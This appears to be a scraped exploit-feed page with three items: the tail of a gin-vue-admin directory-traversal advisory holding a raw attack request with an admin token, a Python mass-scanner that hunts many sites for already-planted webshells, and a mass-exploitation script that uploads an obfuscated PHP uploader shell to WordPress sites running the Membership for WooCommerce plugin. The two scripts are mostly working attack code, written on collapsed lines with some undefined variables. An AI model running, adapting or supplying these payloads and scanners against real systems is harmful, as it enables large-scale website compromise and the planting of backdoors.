    Cookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIyMDA4NiwibmJmIjoxNzExNjE1Mjg2fQ.XVV97Ky17E9pUO_byVgK--FnAp9ye4Tpab2jnma6dBU
    Connection: close
    
    {"plugName":"../../../server/","routerGroup":"111"	,"hasGlobal":true,"hasRequest":false,"hasResponse":false,"global":[{"key":"1","type":"1","desc":"1"},{"key":"type","value":"faspohgoahgioahgioahgioashogia","desc":"1","type":"string"}],"request":[{"key":"","type":"","desc":""}],"response":[{"key":"","type":"","desc":""}]}
    

By performing directory traversal and creating directories such as api, config, global, model, router, and service within the gin-vue-admin/server directory, an attacker can tamper with the source code and the main.go file. They can potentially overwrite or tamper with the Go source code files located in the directory C:\\代码审计\\server to further compromise the system.  
  
  

**Patches**

Please wait for the latest patch

**Workarounds**

You can use the following filtering methods to rectify the directory traversal problem  
if strings.Index(plugPath, "..") > -1 {  
        fmt.Println("no bypass",plugPath)  
    }

**References**

https://github.com/flipped-aurora/gin-vue-admin

**References**

*   GHSA-gv3w-m57p-3wc4
*   flipped-aurora/gin-vue-admin@b1b7427
*   https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys\_auto\_code.go:239

GHSA-gv3w-m57p-3wc4: gin-vue-admin background arbitrary code coverage vulnerability

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

    # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': 'www.google.com'}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20)    pool.map(check_security, urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

WordPress Membership for WooCommerce plugin versions prior to 2.1.7 suffer from a remote shell upload vulnerability.

    # Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)# Date: 2024-02-25# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sys , requests, re , jsonfrom multiprocessing.dummy import Poolfrom colorama import Forefrom colorama import initinit(autoreset=True)headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0','Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, likeGecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','Accept-Encoding': 'gzip, deflate', 'Accept-Language':'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}uploader = """GIF89a<?php ?><!DOCTYPE html><html><head>  <title>Resultz</title></head><body><h1>Uploader</h1>  <form enctype='multipart/form-data' action='' method='POST'>    <p>Uploaded</p>    <input type='file' name='uploaded_file'></input><br />    <input type='submit' value='Upload'></input>  </form></body></html><?PHPif(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echobase64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echobase64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>"""requests.urllib3.disable_warnings()def Exploit(Domain):    try:        if 'http' in Domain:          Domain = Domain        else:          Domain = 'http://'+Domain        myup = {'': ('db.php', uploader)}        req = requests.post(Domain +'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',files=myup, headers=headers,verify=False, timeout=10).text        req1 = requests.get(Domain +'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')        if 'Ex3ptionaL' in req1:          print (fg+'[+] '+ Domain + ' --> Shell Uploaded')          open('Shellz.txt', 'a').write(Domain +'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')        else:          print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')    except:        print(fr+' -| ' + Domain + ' --> {} [Failed]')target = open(input(fm+"Site List: "), "r").read().splitlines()mp = Pool(int(input(fm+"Threads: ")))mp.map(Exploit, target)mp.close()mp.join()

Tag

#webkit